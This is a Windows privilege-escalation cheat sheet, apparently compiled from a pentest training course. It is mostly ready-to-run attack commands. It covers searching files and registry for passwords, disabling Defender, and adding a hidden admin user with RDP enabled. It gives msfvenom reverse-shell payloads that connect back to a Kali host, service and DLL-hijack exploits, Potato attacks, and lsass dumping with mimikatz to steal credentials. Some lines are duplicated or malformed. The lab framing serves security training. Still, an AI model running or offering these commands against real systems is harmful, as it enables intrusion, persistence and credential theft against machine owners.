https://lolbas-project.github.io/#
Windows 10 Exploits https://github.com/nu11secur1ty/Windows10Exploits
- Windows powershell saves all previous commands into a file called ConsoleHost_history. This is located at
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami /priv running process, can enable for different process if user has priv
#State: disabled for running process, can enable for different process depending on access
SeImpersonatePrivilege -> PrintSpoofer, Juicy Potato, Rogue Potato, Hot Potato
SeAssignPrimaryTokenPrivilege -> Juicy Potato
SeTakeOwnershipPrivilege -> become the owner of any object and modify the DACL to grant access.
SeBackup-> can create copy of sam system and run impacket script to dump hashes
If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato
If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato
- Perform a basic search
#in one shot, may take a while
findstr /SI /M "password" *.xml *.ini *.txt
#seperate commands
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
- Find strings in
.configfiles
dir /s *pass* == *cred** == *vnc* == *.config*
- Find all passwords in all files
findstr /spin "password" *.*
- Password files that could have base64 encoded credentials
Unattended files
C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
dir C:\*.vnc.ini /s /b
dir C:\*ultravnc.ini /s /b
dir C:\ /s /b | findstr /si *vnc.ini
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
powershell.exe -nop -ep bypass
Get-ExecutionPolicy
Set-ExecutionPolicy Unrestricted
Set-MpPreference -DisableRealtimeMonitoring $true
- Powershell history
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
- systeminfo
Kernel 6.1 - Windows 7 / Windows Server 2008 R2
Kernel 6.2 - Windows 8 / Windows Server 2012
Kernel 6.3 - Windows 8.1 / Windows Server 2012 R2
Kernel 10 - Windows 10 / Windows Server 2016 / Windows Server 2019 / Windows 11 / Windows Server 2022
%SYSTEMROOT%\System32\drivers\etc\hosts #local DNS entries
%SYSTEMROOT%\System32\drivers\etc\networks #network config
%SYSTEMROOT%\Prefetch #prefetch dir, exe logs
%WINDIR%\system32\config\AppEvent.Evt #application logs
%WINDIR%\system32\config\SecEvent.Evt #security logs
You might want to check for AV first!
Scripts Reference
winPEAS
Other compiled binaries
nishang
JAWS
PowerSploit
PrivEscCheck
Windows Exploit Suggester (Next-Generation) Sherlock Priv2Admin OS priviliges to system
. .\PowerUp.ps1
Invoke-AllChecks
- Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode."
- Unattended Setup is the method by which original equipment manufacturers (OEMs), corporations, and other users install Windows NT in unattended mode." It is also where users passwords are stored in base64. Navigate to:
C:\Windows\Panther\Unattend\Unattended.xml.It is also where users passwords are stored in base64. Navigate to:
C:\Windows\Panther\Unattend\Unattended.xml.
start /B program
- Disable:
REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f
REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /0 REG_DWORD /d 1 /f
Add Admin & Enable RDP
net user /add hacked Password1
net localgroup administrators hacked /add
net localgroup Administrateurs hacked /add (For French target)
net localgroup "Remote Desktop Users" hacked /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service type = REMOTEDESKTOP mode = ENABLE scope = CUSTOM addresses = 10.0.0.1
- On kali box:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
- On Windows (update the IP address with your Kali IP):
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
xfreerdp /v:10.10.25.227 /u:Wade /p:parzival /cert:ignore /drive:/usr/share/windows-resources,share /dynamic-resolution
proxychains -f proxy9051.conf xfreerdp +clipboard /v:10.10.120.5 /d:RLAB /u:'SQL01$' /pth:47b071ssddff02d0f06770137996c /sec:nla /cert:ignore /drive:/home/kali/Documents/htb/rasta/map,share
Credit
- Taken from Tib3rius
- Find out the users on the box and enumerate their privlages
net users
net users Administrator
- Detection
- Open command prompt and type:
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
- In Autoruns, click on the
Logontab. - From the listed results, notice that the “My Program” entry is pointing to
C:\Program Files\Autorun Program\program.exe
- In command prompt type:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
- From the output, notice that the
"Everyone"user group has"FILE_ALL_ACCESS"permission on the"program.exe"file. - Exploitation
- Kali VM
- Open command prompt and type:
msfconsole - In Metasploit (msf > prompt) type:
use multi/handler - In Metasploit (msf > prompt) type:
set payload windows/meterpreter/reverse_tcporwindows/x64/shell/reverse_tcp - In Metasploit (msf > prompt) type:
set lhost [Kali VM IP Address] - In Metasploit (msf > prompt) type:
run - Open an additional command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe - Copy the generated file,
program.exe, to the Windows VM. - Windows VM
- Place
program.exeinC:\Program Files\Autorun Program - To simulate the privilege escalation effect, logoff and then log back on as an administrator user.
- Kali VM
- Wait for a new session to open in Metasploit.
- In Metasploit (msf > prompt) type:
sessions -i [Session ID] - To confirm that the attack succeeded, in Metasploit (msf > prompt) type:
getuid
- Detection
- Windows VM
- Open command prompt and type:
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
- From the output, notice that
AlwaysInstallElevatedvalue is1. - In command prompt type:
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
- From the output, notice that
AlwaysInstallElevatedvalue is1. - Exploitation
- Kali VM
- Open command prompt and type: msfconsole
- In Metasploit (msf > prompt) type:
use multi/handler - In Metasploit (msf > prompt) type: set payload
windows/meterpreter/reverse_tcporwindows/shell_reverse_tcp - In Metasploit (msf > prompt) type:
set lhost [Kali VM IP Address] - In Metasploit (msf > prompt) type:
run - Open an additional command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
- Copy the generated file, setup.msi, to the Windows VM.
Windows VM
- Place
setup.msiinC:\Temp. - Open command prompt and type:
msiexec /quiet /qn /i C:\Temp\setup.msi
- Detection
- Windows VM
- Open powershell prompt and type:
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
- Notice that the output suggests that user belong to
NT AUTHORITY\INTERACTIVEhasFullContolpermission over the registry key. - Exploitation
- Windows VM
- Copy
C:\Users\User\Desktop\Tools\Source\windows_service.cto the Kali VM.
Kali VM
- Open windows_service.c in a text editor and replace the command used by the
system()function to:cmd.exe /k net localgroup administrators user /add - Exit the text editor and compile the file by typing the following in the command prompt:
x86_64-w64-mingw32-gcc windows_service.c -o x.exe
- (NOTE: if this is not installed, use
sudo apt install gcc-mingw-w64) - Copy the generated file
x.exe, to the Windows VM.
Windows VM
- Place
x.exeinC:\Temp. - Open command prompt at type:
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
- In the command prompt type:
sc start regsvc - It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:
net localgroup administrators
- Detection
- Windows VM
- Open command prompt and type:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
- Notice that the
Everyoneuser group hasFILE_ALL_ACCESSpermission on the filepermservice.exe file. - Exploitation
- Windows VM
- Open command prompt and type:
copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
- In command prompt type:
sc start filepermsvc - It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:
net localgroup administrators
- Detection
- Windows VM
- Open command prompt and type: icacls.exe
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
- From the output notice that the
BUILTIN\Usersgroup has full access(F)to the directory. - Exploitation
- Kali VM
- Open command prompt and type:
msfconsole - In Metasploit (msf > prompt) type:
use multi/handler - In Metasploit (msf > prompt) type:
set payload windows/meterpreter/reverse_tcporwindows/shell_reverse_tcp - In Metasploit (msf > prompt) type:
set lhost [Kali VM IP Address] - In Metasploit (msf > prompt) type:
run - Open another command prompt and type:
msfvenom -p windows/shell_reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe - Copy the generated file,
x.exe, to the Windows VM. - Windows VM
- Place
x.exein"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" - Logoff.
- Login with the administrator account credentials.
- Kali VM
- Wait for a session to be created, it may take a few seconds.
- In Meterpreter(meterpreter > prompt) type:
getuidorwhoami - From the output, notice the user is
User-PC\Admin
- Detection
- Windows VM
- Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
- In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time.
- Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on
Procmon.exeand selectRun as administratorfrom the menu. - In procmon, select
filter. From the left-most drop down menu, selectProcess Name. - In the input box on the same line type:
dllhijackservice.exe - Make sure the line reads
Process Name is dllhijackservice.exethenIncludeand click on theAddbutton, thenApplyand lastly onOK. - Next, select from the left-most drop down menu
Result. - In the input box on the same line type:
NAME NOT FOUND - Make sure the line reads
Result is NAME NOT FOUND then Includeand click on theAddbutton, thenApplyand lastly onOK. - Open command prompt and type:
sc start dllsvc
- Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute
C:\Temp\hijackme.dllyet it could not do that as the file was not found. Note thatC:\Tempis a writable location. - Exploitation
- Windows VM
- Copy
C:\Users\User\Desktop\Tools\Source\windows_dll.cto the Kali VM. - Kali VM
- Open
windows_dll.cin a text editor and replace the command used by thesystem()function to:cmd.exe /k net localgroup administrators user /add - Exit the text editor and compile the file by typing the following in the command prompt:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll - Copy the generated file
hijackme.dll, to the Windows VM. - Windows VM
- Place hijackme.dll in
C:\Temp. - Open command prompt and type:
sc stop dllsvc & sc start dllsvc - It is possible to confirm that the
userwas added to thelocal administrators groupby typing the following in the command prompt:
net localgroup administrators
- Detection
- Windows VM
- Open command prompt and type:
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
- Notice that the output suggests that the user
User-PC\Userhas theSERVICE_CHANGE_CONFIGpermission. - Exploitation
- Windows VM
- In command prompt type:
sc config daclsvc binpath= "net localgroup administrators user /add" - In command prompt type:
sc start daclsvc - It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:
net localgroup administrators
- Detection
- Windows VM
- Open command prompt and type:
sc qc unquotedsvc - Notice that the
BINARY_PATH_NAMEfield displays a path that is not confined between quotes. - Exploitation
- Kali VM
- Open command prompt and type:
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe - Copy the generated file,
common.exe, to the Windows VM. - Windows VM
- Place common.exe in
"C:\Program Files\Unquoted Path Service". - Open command prompt and type:
sc start unquotedsvc - It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt:
net localgroup administrators
- Exploitation
- Windows VM
- In command prompt type:
powershell.exe -nop -ep bypass - In Power Shell prompt type:
Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1 - In Power Shell prompt type:
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add" - To confirm that the attack was successful, in Power Shell prompt type:
net localgroup administrators
- Exploitation
- Windows VM
- Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
- Scroll down to the
"<Password>"property and copy the base64 string that is confined between the"<Value>"tags underneath it. - Kali VM
- In a terminal, type:
echo [copied base64] | base64 -d - Notice the cleartext password
- Exploitation
- Kali VM
- Open command prompt and type:
msfconsole - In Metasploit (msf > prompt) type:
use auxiliary/server/capture/http_basic - In Metasploit (msf > prompt) type:
set uripath x - In Metasploit (msf > prompt) type:
run - Windows VM
- Open Internet Explorer and browse to:
http://[Kali VM IP Address]/x - Open command prompt and type: taskmgr
- In Windows Task Manager, right-click on the
iexplore.exein theImage Namecolumnand selectCreate Dump Filefrom the popup menu. - Copy the generated file,
iexplore.DMP, to the Kali VM. - Kali VM
- Place
iexplore.DMPon the desktop. - Open command prompt and type: strings
/root/Desktop/iexplore.DMP | grep "Authorization: Basic" - Select the Copy the Base64 encoded string.
- In command prompt type:
echo -ne [Base64 String] | base64 -d - Notice the credentials in the output.
- Establish a shell
- Kali VM
- Open command prompt and type:
msfconsole - In Metasploit (msf > prompt) type:
use multi/handler - In Metasploit (msf > prompt) type:
set payload windows/meterpreter/reverse_tcp - In Metasploit (msf > prompt) type:
set lhost [Kali VM IP Address] - In Metasploit (msf > prompt) type:
run - Open an additional command prompt and type:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe > shell.exe - Copy the generated file,
shell.exe, to the Windows VM. - Windows VM
- Execute
shell.exeand obtain reverse shell - Detection & Exploitation
- Kali VM
- In Metasploit (msf > prompt) type:
run post/multi/recon/local_exploit_suggester - Identify
exploit/windows/local/ms16_014_wmi_recv_notif as a potential privilege escalation - In Metasploit (msf > prompt) type:
use exploit/windows/local/ms16_014_wmi_recv_notif - In Metasploit (msf > prompt) type:
set SESSION [meterpreter SESSION number] - In Metasploit (msf > prompt) type:
set LPORT 5555 - In Metasploit (msf > prompt) type:
run
- use
procdump
procdump.exe -accepteula -ma lsass.exe C:\Users\Administrator\Desktop\lsass.dmp
#either exfil or perform locally
mimikatz.exe log "sekurlsa::minidump lsass.dmp" sekurlsa::logonpasswords